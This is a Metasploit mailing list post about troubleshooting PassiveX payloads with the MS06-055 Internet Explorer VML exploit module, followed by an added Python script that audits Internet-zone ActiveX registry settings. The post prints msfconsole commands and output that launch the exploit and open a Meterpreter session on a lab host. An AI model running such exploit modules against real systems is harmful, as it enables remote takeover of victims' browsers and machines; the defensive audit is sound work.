Metasploit mailing list archives

PassiveX-based payloads and MS06-055


From: buffer at softmedia.info (Angelo Dell'Aera)
Date: Tue, 13 Mar 2007 12:35:27 +0100



While doing a few tests I noticed a strange behavior while trying
to exploit the VML processing vulnerability in IE referenced by the
Microsoft Bulletin MS06-055 on Windows XP SP1.

The first thing I tried is using Meterpreter as shown below.


msf exploit(ms06_055_vml_method) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.33.130   yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   URIPATH  pentest          no        The URI to use for this exploit (default is random)

Payload options:

   Name      Current Setting                                Required  Description
   ----      ---------------                                --------  -----------
   DLL       /home/buffer/msf3/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
   EXITFUNC  seh                                            yes       Exit technique: seh, thread, process
   LPORT     4444                                           yes       The local port


Exploit target:

   Id  Name                                
   --  ----                                
   0   Windows NT 4.0 -> Windows 2003 SP1  


msf exploit(ms06_055_vml_method) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.33.130:8080/pentest
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) > 
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes) 
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.33.130:39557 -> 192.168.33.199:4444)

... and everything works fine.


When I try using PassiveX Meterpreter instead...

msf exploit(ms06_055_vml_method) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf exploit(ms06_055_vml_method) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.33.130   yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   URIPATH  pentest3         no        The URI to use for this exploit (default is random)


Payload options:

   Name       Current Setting                                Required  Description
   ----       ---------------                                --------  -----------
   DLL        /home/buffer/msf3/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
   EXITFUNC   seh                                            yes       Exit technique: seh, thread, process
   PXAXCLSID  B3AC7307-FEAE-4e43-B2D6-161E68ABA838           yes       ActiveX CLSID
   PXAXDLL    /home/buffer/msf3/data/passivex/passivex.dll   yes       ActiveX DLL to inject
   PXAXVER    -1,-1,-1,-1                                    yes       ActiveX DLL Version
   PXHOST     192.168.33.130                                 yes       The local HTTP listener hostname
   PXPORT     10000                                          yes       The local HTTP listener port
   PXURI      /OPrZwdoVOupJ0PB4rCdiaWXi1wIB5e9s              no        The URI root for requests


I see this behavior...


msf exploit(ms06_055_vml_method) > exploit
[*] PassiveX listener started.
[*] Using URL: http://192.168.33.130:8080/pentest3
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) > 
[*] Sending PassiveX main page to client


and it stops here. I tried using other PassiveX-based payloads with
the same exploit but no luck... always the same result. Other
non-PassiveX-based payloads work instead.

I took a look at the registry and everything seems to work fine since 

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Values: 1004, 1200, 1201, 1001

are changed to the value 0 as expected.


Regards,

-- 

Angelo Dell'Aera 'buffer' 
Antifork Research, Inc.         http://buffer.antifork.org
Metro Olografix

PGP information in e-mail header
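A defender-side check prompted by the registry observation in the post above. This is an added example, not code from the post or from Metasploit: it parses a `reg export` of the HKCU Internet zone key (Zone 3) and flags the four ActiveX action codes the post names (1001, 1004, 1200, 1201) whenever they are set to 0, i.e. "Enable", which is not how a stock Internet zone is configured. The action meanings and the 0/1/3 = Enable/Prompt/Disable encoding follow Microsoft's documented Internet Explorer zone settings; the sample export text is constructed for the example (already decoded from UTF-16LE), and the function names and findings format are this example's own choices.

```python
import re

# IE security-zone action codes referenced in the post. Zone 3 is the
# Internet zone. DWORD value meanings: 0 = Enable, 1 = Prompt, 3 = Disable.
ACTIVEX_ACTIONS = {
    "1001": "Download signed ActiveX controls",
    "1004": "Download unsigned ActiveX controls",
    "1200": "Run ActiveX controls and plug-ins",
    "1201": "Initialize and script ActiveX controls not marked as safe for scripting",
}

# Suffix of the registry key path the post refers to (HKCU Internet zone).
ZONE3_KEY_SUFFIX = r"\Internet Settings\Zones\3"

# Constructed sample of a `reg export` of that key, already decoded to str.
# Three of the four ActiveX actions are forced to Enable (0); 1001 is Prompt.
SAMPLE_REG_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]
"DisplayName"="Internet"
"1001"=dword:00000001
"1004"=dword:00000000
"1200"=dword:00000000
"1201"=dword:00000000
"1400"=dword:00000000
"""

_DWORD_LINE = re.compile(r'"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg_export(text):
    """Return {key_path: {value_name: int}} for the DWORD values in a .reg export.

    Only dword values are collected; strings and binary values are ignored
    because the zone action codes of interest are all DWORDs.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"'):
            m = _DWORD_LINE.match(line)
            if m:
                keys[current][m.group(1)] = int(m.group(2), 16)
    return keys


def audit_internet_zone(text):
    """Return a list of (action_code, description) for every ActiveX action in
    the Internet zone that is set to Enable (0). An empty list means none of the
    four actions the post mentions has been opened up.
    """
    findings = []
    for key_path, values in parse_reg_export(text).items():
        if not key_path.endswith(ZONE3_KEY_SUFFIX):
            continue
        for code, description in ACTIVEX_ACTIONS.items():
            if values.get(code) == 0:
                findings.append((code, description))
    return findings


if __name__ == "__main__":
    for code, description in audit_internet_zone(SAMPLE_REG_EXPORT):
        print(f"Internet zone action {code} is Enabled: {description}")
```

To run it against a real machine, export the key first (`reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3" zone3.reg`) and open the file with `encoding="utf-16"`, since `reg export` writes UTF-16LE with a BOM; then pass the decoded text to `audit_internet_zone`. Values that the post lists as changed to 0 are exactly the ones this check reports, so an unexpected non-empty result on a workstation is worth a look.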



